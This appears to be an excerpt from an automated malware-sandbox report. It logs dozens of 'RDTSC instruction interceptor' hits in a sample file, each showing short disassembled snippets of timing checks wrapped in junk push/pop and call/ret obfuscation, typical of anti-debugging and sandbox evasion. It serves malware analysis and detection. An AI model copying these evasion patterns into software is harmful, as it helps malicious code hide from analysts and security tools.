                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F566E second address: 5F5674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F5674 second address: 5F567A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8F96 second address: 5F8FAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F6C54B5854Ah 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8FAE second address: 5F8FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F8FB5 second address: 5F9056 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F6C54B58546h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push esi 0x0000000e mov ecx, esi 0x00000010 pop ecx 0x00000011 push 00000000h 0x00000013 mov ch, dl 0x00000015 push BC03E034h 0x0000001a push eax 0x0000001b jmp 00007F6C54B58555h 0x00000020 pop eax 0x00000021 add dword ptr [esp], 43FC204Ch 0x00000028 push 00000003h 0x0000002a mov di, F5EBh 0x0000002e push 00000000h 0x00000030 call 00007F6C54B5854Ah 0x00000035 movsx esi, di 0x00000038 pop edx 0x00000039 push ebx 0x0000003a mov ecx, dword ptr [ebp+122D2B47h] 0x00000040 pop ecx 0x00000041 push 00000003h 0x00000043 movzx edx, di 0x00000046 call 00007F6C54B58549h 0x0000004b push ebx 0x0000004c jnl 00007F6C54B58548h 0x00000052 pop ebx 0x00000053 push eax 0x00000054 jmp 00007F6C54B58556h 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d pushad 0x0000005e jp 00007F6C54B58548h 0x00000064 push eax 0x00000065 pop eax 0x00000066 pushad 0x00000067 jmp 00007F6C54B5854Ch 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9056 second address: 5F907A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jne 00007F6C544CAC38h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F907A second address: 5F9090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jg 00007F6C54B58546h 0x00000015 pop eax 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9090 second address: 5F90E4 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F6C544CAC28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b call 00007F6C544CAC37h 0x00000010 mov dword ptr [ebp+122D3880h], ecx 0x00000016 pop ecx 0x00000017 lea ebx, dword ptr [ebp+12458E86h] 0x0000001d mov di, D5CAh 0x00000021 xchg eax, ebx 0x00000022 jmp 00007F6C544CAC31h 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushad 0x0000002c popad 0x0000002d jc 00007F6C544CAC26h 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F90E4 second address: 5F90E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F92FA second address: 5F92FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F92FF second address: 5F936A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6C54B58546h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jno 00007F6C54B5854Eh 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007F6C54B58550h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jng 00007F6C54B5854Ah 0x00000028 push esi 0x00000029 push edx 0x0000002a pop edx 0x0000002b pop esi 0x0000002c pop eax 0x0000002d movsx edx, cx 0x00000030 push 00000003h 0x00000032 pushad 0x00000033 sbb ebx, 0D8D11FAh 0x00000039 mov ax, bx 0x0000003c popad 0x0000003d push 00000000h 0x0000003f push 00000003h 0x00000041 jp 00007F6C54B5854Ch 0x00000047 push 782E5390h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F936A second address: 5F9384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9384 second address: 5F9389 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F9389 second address: 5F93C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 47D1AC70h 0x0000000e add dword ptr [ebp+122D3C03h], edx 0x00000014 lea ebx, dword ptr [ebp+12458E9Ah] 0x0000001a mov esi, dword ptr [ebp+122D2A1Bh] 0x00000020 xchg eax, ebx 0x00000021 pushad 0x00000022 jnp 00007F6C544CAC37h 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F93C6 second address: 5F93E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F6C54B58548h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5F93E7 second address: 5F93EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61695E second address: 616966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616AF4 second address: 616AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616AFA second address: 616B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616B03 second address: 616B0F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170C6 second address: 6170CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170CC second address: 6170D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170D0 second address: 6170DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170DA second address: 6170E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170E0 second address: 6170E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6170E4 second address: 6170ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617655 second address: 617671 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F6C54B58546h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617671 second address: 617677 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DE63A second address: 5DE658 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58558h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617EA2 second address: 617EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617EA8 second address: 617EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 617FFB second address: 61803C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6C544CAC26h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jbe 00007F6C544CAC26h 0x00000012 js 00007F6C544CAC26h 0x00000018 popad 0x00000019 jg 00007F6C544CAC28h 0x0000001f push edi 0x00000020 pop edi 0x00000021 popad 0x00000022 push eax 0x00000023 push edi 0x00000024 jmp 00007F6C544CAC34h 0x00000029 pop edi 0x0000002a jg 00007F6C544CAC2Ch 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ED5DD second address: 5ED604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F6C54B58546h 0x0000000a jbe 00007F6C54B58546h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F6C54B58553h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61F746 second address: 61F74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621246 second address: 62125B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C54B5854Ah 0x00000009 popad 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62125B second address: 621264 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 621264 second address: 621278 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6C54B58546h 0x0000000a popad 0x0000000b push eax 0x0000000c jne 00007F6C54B58546h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF164 second address: 5EF172 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jno 00007F6C544CAC26h 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF172 second address: 5EF178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5EF178 second address: 5EF17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625122 second address: 625128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625128 second address: 625142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC31h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625142 second address: 625146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625146 second address: 62514A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625268 second address: 625299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F6C54B58553h 0x0000000a push ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop ebx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F6C54B58552h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625299 second address: 6252A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jbe 00007F6C544CAC26h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62540E second address: 625418 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6C54B58546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625418 second address: 62541E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62541E second address: 625424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625424 second address: 62545D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jg 00007F6C544CAC3Ah 0x0000001b jmp 00007F6C544CAC32h 0x00000020 push edx 0x00000021 pop edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jne 00007F6C544CAC26h 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62545D second address: 62547A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F6C54B58554h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625925 second address: 625929 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 625929 second address: 625941 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B58554h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626451 second address: 62645A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626BCD second address: 626BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626BD2 second address: 626BD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62735B second address: 627361 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627C2E second address: 627C34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627C34 second address: 627C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627C38 second address: 627C5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C544CAC37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627C5A second address: 627C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628EDF second address: 628EE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A1FA second address: 62A289 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6C54B58546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F6C54B58548h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 sub dword ptr [ebp+122D3324h], edx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F6C54B58548h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 00000017h 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 push 00000000h 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F6C54B58548h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 0000001Bh 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 sub dword ptr [ebp+12474F78h], esi 0x0000006b mov si, dx 0x0000006e xchg eax, ebx 0x0000006f pushad 0x00000070 push eax 0x00000071 push edx 0x00000072 jns 00007F6C54B58546h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A289 second address: 62A296 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6C544CAC26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A930 second address: 62A946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6C54B58551h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBC6 second address: 62CBCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CBCC second address: 62CC48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F6C54B58548h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 jmp 00007F6C54B5854Bh 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D3BB1h], edx 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebp 0x00000035 call 00007F6C54B58548h 0x0000003a pop ebp 0x0000003b mov dword ptr [esp+04h], ebp 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc ebp 0x00000048 push ebp 0x00000049 ret 0x0000004a pop ebp 0x0000004b ret 0x0000004c je 00007F6C54B5854Ch 0x00000052 mov esi, dword ptr [ebp+122D2AD3h] 0x00000058 movzx edi, ax 0x0000005b mov si, EED1h 0x0000005f xchg eax, ebx 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 push edx 0x00000064 pop edx 0x00000065 pop esi 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62CC48 second address: 62CC4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62CC4F second address: 62CC61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jl 00007F6C54B58546h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D481 second address: 62D487 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 62D487 second address: 62D498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 je 00007F6C54B58554h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631524 second address: 631598 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F6C544CAC28h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 and edi, dword ptr [ebp+122D2B2Bh] 0x0000002a jmp 00007F6C544CAC38h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F6C544CAC28h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000018h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b push 00000000h 0x0000004d mov bl, 30h 0x0000004f push eax 0x00000050 push esi 0x00000051 push eax 0x00000052 push edx 0x00000053 jng 00007F6C544CAC26h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 631598 second address: 63159C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6327C6 second address: 6327D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F6C544CAC26h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6327D9 second address: 6327DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6337BF second address: 6337C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6327DF second address: 632862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6C54B5854Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jns 00007F6C54B5854Ch 0x00000010 sub dword ptr [ebp+122D37F9h], edi 0x00000016 sub dword ptr [ebp+122D398Bh], edx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov bx, 0BF7h 0x00000027 mov dword ptr [ebp+122D3B83h], edx 0x0000002d mov dword ptr fs:[00000000h], esp 0x00000034 mov bx, B2E1h 0x00000038 mov eax, dword ptr [ebp+122D10CDh] 0x0000003e movzx ebx, di 0x00000041 push FFFFFFFFh 0x00000043 push 00000000h 0x00000045 push eax 0x00000046 call 00007F6C54B58548h 0x0000004b pop eax 0x0000004c mov dword ptr [esp+04h], eax 0x00000050 add dword ptr [esp+04h], 0000001Ch 0x00000058 inc eax 0x00000059 push eax 0x0000005a ret 0x0000005b pop eax 0x0000005c ret 0x0000005d jnp 00007F6C54B58549h 0x00000063 mov di, dx 0x00000066 push eax 0x00000067 jp 00007F6C54B5854Eh 0x0000006d push ebx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 636283 second address: 63629B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6C544CAC30h 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
